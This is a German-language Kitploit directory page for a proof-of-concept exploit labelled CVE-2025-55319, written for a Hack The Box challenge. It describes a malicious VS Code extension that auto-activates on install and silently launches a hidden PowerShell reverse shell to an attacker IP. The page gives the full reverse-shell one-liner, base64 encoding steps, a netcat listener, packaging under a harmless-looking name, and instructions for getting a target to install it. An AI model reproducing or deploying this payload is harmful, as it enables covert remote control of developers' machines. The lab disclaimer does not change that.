Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55319-PoC — PoC for CVE-2025-55319 | Kitploit
Tools/GitHubGitHub/nephila016/cve-2025-55319-poc
ExploitationCTFCommand and ControlSocial EngineeringRed TeamingRemote Access ToolPayload DevelopmentLabs & Practice
GitHubnephila016/cve-2025-55319-poc

CVE-2025-55319-PoC

PoC for CVE-2025-55319

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Referenz: CVE-2025-55319

Proof-of-concept VS Code (.vsix)-Erweiterung für die HTB "Checkpoint"-Challenge.
Nach der Installation aktiviert sich die Erweiterung automatisch und startet eine versteckte PowerShell-Reverse-Shell zurück zum Angreifer.

⚠️ Nur für autorisierte Nutzung. Dies ist ein CTF/Labor-Artefakt. Setzen Sie es nur gegen Maschinen ein, die Ihnen gehören oder für die Sie explizit autorisiert sind (z.B. eine HTB-Zielbox).


So funktioniert es

  • extension/package.json — Erweiterungsmanifest. "activationEvents": ["*"] bewirkt, dass es beim Laden von VS Code sofort ausgeführt wird, ohne Benutzerinteraktion.
  • extension/extension.js — führt bei activate() ein base64-kodiertes PowerShell-Payload mit -WindowStyle Hidden -NoProfile für eine stille Reverse-Shell aus.
  • [Content_Types].xml — OpenXML-Inhaltstyp-Manifest, damit der Ordner in ein gültiges .vsix-Paket gezippt werden kann.

Layout

root@kitploit:~
.
├── [Content_Types].xml     # VSIX-Inhaltstyp-Manifest
└── extension/
    ├── package.json        # Erweiterungsmanifest (aktiviert bei "*")
    └── extension.js        # Reverse-Shell-Payload

Verwendung

1. Erstellen Sie Ihr Payload

Generieren Sie eine base64 (UTF-16LE) PowerShell-Reverse-Shell, die auf Ihre Angriffsbox zeigt:

root@kitploit:~
LHOST=10.10.15.158
LPORT=4443
PS="\$c=New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){\$d=(New-Object System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=(iex \$d 2>&1|Out-String);\$sb=([text.encoding]::ASCII).GetBytes(\$r+'PS> ');\$s.Write(\$sb,0,\$sb.Length);\$s.Flush()}"
echo -n "$PS" | iconv -t UTF-16LE | base64 -w0

Fügen Sie die Ausgabe über YOUR_BASE64_PAYLOAD_HERE in extension/extension.js ein:

root@kitploit:~
const payload = '<base64-blob-here>'

2. Starten Sie Ihren Listener

root@kitploit:~
nc -lvnp 4443

3. In eine .vsix-Datei packen

Eine .vsix-Datei ist einfach ein ZIP mit dem extension/-Ordner plus dem Manifest im Stammverzeichnis:

root@kitploit:~
# from this directory
zip -r devtools-helper.vsix extension "[Content_Types].xml"

4. Ausliefern & auslösen

Bringen Sie das Ziel dazu, die Erweiterung zu installieren. Entweder:

  • CLI: code --install-extension devtools-helper.vsix
  • GUI: Erweiterungsansicht → Menü ··· → Aus VSIX installieren…

Beim nächsten VS Code-Start (oder sofort nach der Installation) wird das *-Aktivierungsereignis ausgelöst, das Payload ausgeführt und Ihr Listener empfängt die Shell.

root@kitploit:~
$ nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.15.158] from ...
PS>

Bereinigung

Entfernen Sie die Erweiterung vom Ziel, wenn Sie fertig sind:

root@kitploit:~
code --uninstall-extension devtools.devtools-helper

Hinweise

  • Das Payload zielt auf Windows (PowerShell) ab. Passen Sie extension.js für andere Plattformen an.
  • os wird in extension.js importiert, aber nicht verwendet — praktisch, wenn Sie auf os.platform() verzweigen möchten, um Linux/macOS-Ziele zu unterstützen.
  • Erhöhen Sie die version in package.json zwischen Builds, wenn Sie neu packen.
Tool herunterladen